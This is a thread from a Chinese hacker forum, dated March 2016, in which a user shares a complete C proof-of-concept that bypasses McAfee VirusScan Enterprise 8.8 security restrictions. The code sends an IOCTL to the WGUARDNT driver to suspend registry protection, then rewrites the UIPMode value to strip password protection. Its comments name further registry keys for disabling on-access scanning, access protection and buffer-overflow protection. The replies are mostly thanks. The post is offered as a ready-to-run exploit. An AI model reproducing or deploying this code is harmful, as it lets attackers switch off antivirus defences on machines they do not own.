搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 McAfee VirusScan企业版8.8安全限制绕过漏洞
查看: 45823|回复: 2174

McAfee VirusScan企业版8.8安全限制绕过漏洞

[复制链接]
90_
发表于 2016-3-8 09:39:05 | 显示全部楼层 |阅读模式
2016年3月8号出的洞,还是比较新的

[C] 纯文本查看 复制代码
  
#include <stdio.h>
#include <windows.h>
  
HANDLE opendevice()
{
  HANDLE result;
  
  if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
    if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
      if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
        if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
          result = 0;
    
  return result;
}
  
  
void main(int argc, char ** argv)
{
    HKEY reg_key = NULL;
    HANDLE p;
    DWORD BytesReturned;
    DWORD data = 0;
    unsigned long size = 4;
    DWORD type = REG_DWORD;
    DWORD data1 = 0;
  
    char status[4][70]= {
        "No password",
        "Password protection for all items listed",
        "Password protection for the selected items",
        "Password protection for conformance to Common Criteria"
    };
  
    printf("\n *******************************************\n");
    printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
    printf(" *******************************************\n\n");
  
    /*
     * The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
     * disable the password protection, but you can also access to others useful
     * keys.
     *
     * User Password
     * HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
     * HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
     *
     * Buffer protection
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
     *
     * Access protection
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
     *
     * On Access Scanner
     * HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
     *
     * Others
     * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
     *
     */
  
    if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0,  KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
    {
        if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\\Wow6432Node\McAfee\\DesktopProtection", 0,  KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
        {   
            printf("Error opening registry key...\n");
            return;
        }   
    }
      
    // Check current status of McAfee protection    
    RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size);
  
    printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]);
  
    RegCloseKey (reg_key);
  
    // Open McAfee magic device
    p = opendevice();
  
    printf(" [-] Please John, let me write to your registry keys...");
      
    // Request to the scan engine to stop protect registry keys
    DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);
  
    if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0,  KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
        if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0,  KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
        {
            printf(" hmmm hmmm something went wrong!\n\n");
            printf(" [-] Ok John, take the control again!\n");      
            DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
            CloseHandle(p);
            return;
        }   
              
    printf(" OK\n");
    data1 = 0;
          
    if( argc > 1 )
        data1 = atoi(argv[1]);
      
    // Disable McAfee protection    
    if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
        printf("\n hmmm hmmm something went wrong!\n");
    else
        printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1);
              
    RegCloseKey (reg_key);
              
    printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data);
  
    // Tell to engine to take control again
    printf(" [-] Ok John, take the control again!\n");      
    DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
    CloseHandle(p);
      
}
McAfee, 企业版

相关帖子
回复

使用道具 举报

ayang
发表于 2016-3-8 10:00:59 | 显示全部楼层
谢谢楼主的分享
回复 支持 反对

使用道具 举报

小圈圈
发表于 2016-3-8 14:22:47 | 显示全部楼层
好新啊
回复 支持 反对

使用道具 举报

w2015
发表于 2016-3-8 20:28:23 | 显示全部楼层
怎么用是关键???
回复 支持 反对

使用道具 举报

borall
发表于 2016-3-9 05:47:04 | 显示全部楼层
回复 支持 反对

使用道具 举报

HUC-参谋长
发表于 2016-3-9 06:17:15 | 显示全部楼层
非常感谢
回复 支持 反对

使用道具 举报

54hacker
发表于 2016-3-9 18:57:47 | 显示全部楼层
回复 支持 反对

使用道具 举报

a136
发表于 2016-3-9 19:33:56 | 显示全部楼层
谢谢楼主的分享
回复 支持 反对

使用道具 举报

菜鸟小羽
发表于 2016-3-9 19:36:03 | 显示全部楼层
非常感谢
回复 支持 反对

使用道具 举报

ljy07
发表于 2016-3-9 22:25:36 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

下一页 »
12下一页
返回列表 发帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 04:25 , Processed in 0.022898 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部